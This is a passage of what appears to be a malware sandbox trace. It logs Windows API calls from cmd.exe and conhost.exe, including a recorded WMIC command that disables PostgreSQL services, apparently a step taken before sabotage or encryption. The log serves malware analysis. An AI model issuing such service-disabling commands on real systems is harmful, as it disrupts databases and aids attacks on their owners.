Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0118.466] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0118.467] GetConsoleTitleW (in: lpConsoleTitle=0x474ab00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0118.467] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0118.467] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0118.467] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0118.468] GetEnvironmentVariableW (in: lpName="postgresql", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0118.468] _wcsicmp (_String1="postgresql", _String2="CD") returned 13 [0118.468] _wcsicmp (_String1="postgresql", _String2="ERRORLEVEL") returned 11 [0118.468] _wcsicmp (_String1="postgresql", _String2="CMDEXTVERSION") returned 13 [0118.468] _wcsicmp (_String1="postgresql", _String2="CMDCMDLINE") returned 13 [0118.468] _wcsicmp (_String1="postgresql", _String2="DATE") returned 12 [0118.468] _wcsicmp (_String1="postgresql", _String2="TIME") returned -4 [0118.468] _wcsicmp (_String1="postgresql", _String2="RANDOM") returned -2 [0118.468] _wcsicmp (_String1="postgresql", _String2="HIGHESTNUMANODENUMBER") returned 8 [0118.468] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0118.468] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0118.468] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0118.468] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0118.468] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0118.468] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0118.468] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0118.470] GetConsoleTitleW (in: lpConsoleTitle=0x456f548, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.470] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0118.470] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0118.470] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0118.470] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0118.470] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0118.470] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0118.470] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0118.470] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0118.470] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0118.470] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0118.470] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0118.470] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0118.470] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0118.470] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0118.470] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0118.470] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0118.470] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0118.470] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0118.470] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0118.470] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0118.470] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0118.470] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0118.470] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0118.470] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0118.470] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0118.470] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0118.470] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0118.470] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0118.470] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0118.470] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0118.470] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0118.470] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0118.470] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0118.470] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0118.470] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0118.470] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0118.470] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0118.470] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0118.470] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0118.471] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0118.471] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0118.471] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0118.471] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0118.471] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0118.471] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0118.471] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0118.471] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0118.471] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0118.471] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0118.471] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0118.471] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0118.471] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0118.471] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0118.471] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0118.471] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0118.471] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0118.471] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0118.471] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0118.471] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0118.471] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0118.471] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0118.471] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0118.471] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0118.471] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0118.471] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0118.471] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0118.471] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0118.471] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0118.471] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0118.471] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0118.471] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0118.471] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0118.471] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0118.471] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0118.471] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0118.471] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0118.471] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0118.471] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0118.471] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0118.471] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0118.471] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0118.471] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0118.471] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0118.471] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0118.471] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0118.471] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0118.471] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0118.472] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0118.472] SetErrorMode (uMode=0x0) returned 0x0 [0118.472] SetErrorMode (uMode=0x1) returned 0x0 [0118.472] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47405d0, lpFilePart=0x456f054 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x456f054*="Desktop") returned 0x1d [0118.472] SetErrorMode (uMode=0x0) returned 0x1 [0118.472] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0118.472] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.477] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.478] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x456ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456ede0) returned 0xffffffff [0118.478] GetLastError () returned 0x2 [0118.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.478] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x456ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456ede0) returned 0xffffffff [0118.478] GetLastError () returned 0x2 [0118.479] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x456ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456ede0) returned 0xffffffff [0118.479] GetLastError () returned 0x2 [0118.479] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x456ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456ede0) returned 0xffffffff [0118.479] GetLastError () returned 0x2 [0118.479] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x456ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456ede0) returned 0x474b2d8 [0118.479] FindClose (in: hFindFile=0x474b2d8 | out: hFindFile=0x474b2d8) returned 1 [0118.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x456ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456ede0) returned 0xffffffff [0118.479] GetLastError () returned 0x2 [0118.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x456ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456ede0) returned 0x474b2d8 [0118.479] FindClose (in: hFindFile=0x474b2d8 | out: hFindFile=0x474b2d8) returned 1 [0118.479] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.479] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.479] GetConsoleTitleW (in: lpConsoleTitle=0x456f2d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.480] InitializeProcThreadAttributeList (in: lpAttributeList=0x456f200, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x456f1e4 | out: lpAttributeList=0x456f200, lpSize=0x456f1e4) returned 1 [0118.480] UpdateProcThreadAttribute (in: lpAttributeList=0x456f200, dwFlags=0x0, Attribute=0x60001, lpValue=0x456f1ec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x456f200, lpPreviousValue=0x0) returned 1 [0118.480] GetStartupInfoW (in: lpStartupInfo=0x456f238 | out: lpStartupInfo=0x456f238*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0118.480] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0118.481] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0118.481] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0118.482] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x456f188*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x456f1d4 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x456f1d4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xfd8, dwThreadId=0xfdc)) returned 1 [0118.488] CloseHandle (hObject=0xa4) returned 1 [0118.488] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0118.488] GetEnvironmentStringsW () returned 0x4749f78* [0118.488] FreeEnvironmentStringsA (penv="=") returned 1 [0118.488] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0119.320] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x456f16c | out: lpExitCode=0x456f16c*=0x0) returned 1 [0119.321] CloseHandle (hObject=0xa8) returned 1 [0119.321] _vsnwprintf (in: _Buffer=0x456f254, _BufferCount=0x13, _Format="%08X", _ArgList=0x456f174 | out: _Buffer="00000000") returned 8 [0119.321] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0119.321] GetEnvironmentStringsW () returned 0x474b408* [0119.321] FreeEnvironmentStringsA (penv="=") returned 1 [0119.321] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0119.321] GetEnvironmentStringsW () returned 0x474b408* [0119.321] FreeEnvironmentStringsA (penv="=") returned 1 [0119.321] DeleteProcThreadAttributeList (in: lpAttributeList=0x456f200 | out: lpAttributeList=0x456f200) [0119.321] _get_osfhandle (_FileHandle=1) returned 0x3c [0119.321] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0119.321] _get_osfhandle (_FileHandle=1) returned 0x3c [0119.321] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0119.322] _get_osfhandle (_FileHandle=0) returned 0x38 [0119.322] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0119.322] SetConsoleInputExeNameW () returned 0x1 [0119.322] GetConsoleOutputCP () returned 0x1b5 [0119.322] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0119.322] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.322] exit (_Code=0) Thread: id = 289 os_tid = 0xfd4 Process: id = "65" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x408bc000" os_pid = "0xfc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "64" os_parent_pid = "0xfbc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4219 start_va = 0x7f477000 end_va = 0x7f477fff entry_point = 0x0 region_type = private name = "private_0x000000007f477000" filename = "" Region: id = 4220 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4221 start_va = 0x361b0b0000 end_va = 0x361b0cffff entry_point = 0x0 region_type = private name = "private_0x000000361b0b0000" filename = "" Region: id = 4222 start_va = 0x361b0d0000 end_va = 0x361b0e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000361b0d0000" filename = "" Region: id = 4223 start_va = 0x361b0f0000 end_va = 0x361b12ffff entry_point = 0x0 region_type = private name = "private_0x000000361b0f0000" filename = "" Region: id = 4224 start_va = 0x7df5ffe60000 end_va = 0x7ff5ffe5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe60000" filename = "" Region: id = 4225 start_va = 0x7ff6c4590000 end_va = 0x7ff6c45b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4590000" filename = "" Region: id = 4226 start_va = 0x7ff6c45bd000 end_va = 0x7ff6c45bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45bd000" filename = "" Region: id = 4227 start_va = 0x7ff6c45be000 end_va = 0x7ff6c45bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45be000" filename = "" Region: id = 4228 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 4229 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4230 start_va = 0x361b300000 end_va = 0x361b3fffff entry_point = 0x0 region_type = private name = "private_0x000000361b300000" filename = "" Region: id = 4231 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4232 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4233 start_va = 0x361b0b0000 end_va = 0x361b0bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000361b0b0000" filename = "" Region: id = 4234 start_va = 0x361b0c0000 end_va = 0x361b0c6fff entry_point = 0x0 region_type = private name = "private_0x000000361b0c0000" filename = "" Region: id = 4235 start_va = 0x361b130000 end_va = 0x361b1edfff entry_point = 0x361b130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4236 start_va = 0x361b1f0000 end_va = 0x361b22ffff entry_point = 0x0 region_type = private name = "private_0x000000361b1f0000" filename = "" Region: id = 4237 start_va = 0x361b230000 end_va = 0x361b230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000361b230000" filename = "" Region: id = 4238 start_va = 0x361b240000 end_va = 0x361b246fff entry_point = 0x0 region_type = private name = "private_0x000000361b240000" filename = "" Region: id = 4239 start_va = 0x361b250000 end_va = 0x361b250fff entry_point = 0x0 region_type = private name = "private_0x000000361b250000" filename = "" Region: id = 4240 start_va = 0x361b260000 end_va = 0x361b260fff entry_point = 0x0 region_type = private name = "private_0x000000361b260000" filename = "" Region: id = 4241 start_va = 0x361b520000 end_va = 0x361b52ffff entry_point = 0x0 region_type = private name = "private_0x000000361b520000" filename = "" Region: id = 4242 start_va = 0x361b530000 end_va = 0x361b6b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000361b530000" filename = "" Region: id = 4243 start_va = 0x361b6c0000 end_va = 0x361b840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000361b6c0000" filename = "" Region: id = 4244 start_va = 0x361b850000 end_va = 0x361cc4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000361b850000" filename = "" Region: id = 4245 start_va = 0x7ff6c4490000 end_va = 0x7ff6c458ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4490000" filename = "" Region: id = 4246 start_va = 0x7ff6c45bb000 end_va = 0x7ff6c45bcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45bb000" filename = "" Region: id = 4247 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 4248 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4249 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4250 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4251 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4252 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4253 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4254 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4255 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4256 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = 